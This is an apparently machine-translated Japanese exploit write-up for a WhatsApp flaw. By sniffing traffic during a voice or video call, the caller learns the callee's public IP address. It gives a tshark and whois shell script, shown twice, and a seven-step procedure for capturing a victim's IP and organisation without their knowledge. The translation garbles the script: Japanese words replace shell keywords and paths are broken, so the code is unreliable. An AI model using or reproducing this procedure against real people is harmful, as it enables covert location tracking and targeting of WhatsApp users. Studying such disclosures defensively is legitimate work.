このプログラムは教育目的のみです。許可なく使用しないでください。通常の免責事項が適用されます。特に、ME(BHDRESH)は、これらのプログラムが提供する情報または機能の直接的または間接的な使用によって引き起こされる損害について責任を負いません。著者またはインターネットプロバイダーは、これらのプログラムまたはそのデリバティブのコンテンツや誤用について責任を負いません。このプログラムを使用することにより、これらのプログラムの使用によって引き起こされる損害(データロス、システムクラッシュ、システムの妥協など)はBHDRESHの責任ではないという事実を受け入れます。
最後に、これは個人的な発展です。その哲学を尊重し、悪いことに使用しないでください!
https://vimeo.com/577355374
すべてのプラットフォームでのWhatsAppアプリケーションの最新バージョンは、リモートWhatsAppユーザーパブリックIP開示に対して脆弱です。
WhatsApp(音声 /ビデオ)の呼び出し中に、発信者側のアプリケーションは、受信者デバイスのパブリックIPアドレスとの直接的な接続を確立しようとすることが観察されています。宛先ホストからFacebookおよびWhatsAppサーバーIPアドレスをフィルタリングすることにより、ターゲットWhatsAppユーザーの正しいパブリックIPアドレスを知ることなく表示することができます。
以下は、この脆弱性を活用するための簡単なスクリプトです。
#!/bin/sh
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
エコー「Enterを押してターゲットを呼び出します。」
行を読む
tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst!= 192.168.0.0/16およびip.dst!= 10.0.0.0/8およびip.dst!= 172.16.0.0/12 "|読み取りラインはwhois $ line> /tmp /bをします
filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
["$ filter" -gt 0];次に、TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi done
WhatsAppユーザーをパブリックIPにマッピングする可能性は、WhatsAppユーザーの位置情報を明らかにするだけでなく、位置履歴を維持することで身体の動きを追跡するために誤用することもできます。ユーザーからIP情報間のこのような直接マッピングは、ユーザーのサーフィン習慣を追跡し、彼に影響を与えるために誤用することもできます。
さらに、Public IPは、WhatsAppユーザーホームまたはオフィスに対するターゲット攻撃を開始するために活用される可能性があります。
ユーザー:useraは、userbのwhatsapp詳細を持っています
環境:n/a
ブラウザ:n/a
アプリバージョン:<=任意のプラットフォーム上のWhatsAppアプリケーションの最新バージョン
OS:Webを除くすべてのプラットフォーム
説明:useraは、userbにwhatsappコールを行い、userbの知識なしにパブリックIP情報をキャプチャします。ステップをよりよく理解するためのビデオPOC:https://vimeo.com/577355374
ステップ1:攻撃者マシンでWiFiホットスポットを開始し、攻撃者の電話を攻撃者SSIDに接続します
ステップ2:攻撃者電話のルーターとして機能している攻撃者マシンでPOCスクリプト(下)を開始します
#!/bin/sh
filter = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
エコー「Enterを押してターゲットを呼び出します。」
行を読む
tshark -i eth0 -l -t fields -f "udp" -e ip.dst -y "$ filter" -y "ip.dst!= 192.168.0.0/16およびip.dst!= 10.0.0.0/8およびip.dst!= 172.16.0.0/12 "|読み取りラインはwhois $ line> /tmp /bをします
filter = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
["$ filter" -gt 0];次に、TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi done
ステップ3:whatsappユーザーをランダムに呼び出してサーバーIPアドレスをキャプチャしてフィルタリングします
ステップ4:WhatsAppの被害者に電話してください
ステップ5:一度確立されたコールを切断します
ステップ6:スクリプトがターゲットのパブリックIPアドレスを明らかにします
ステップ7:ターゲット電話でパブリックIPアドレスを検証する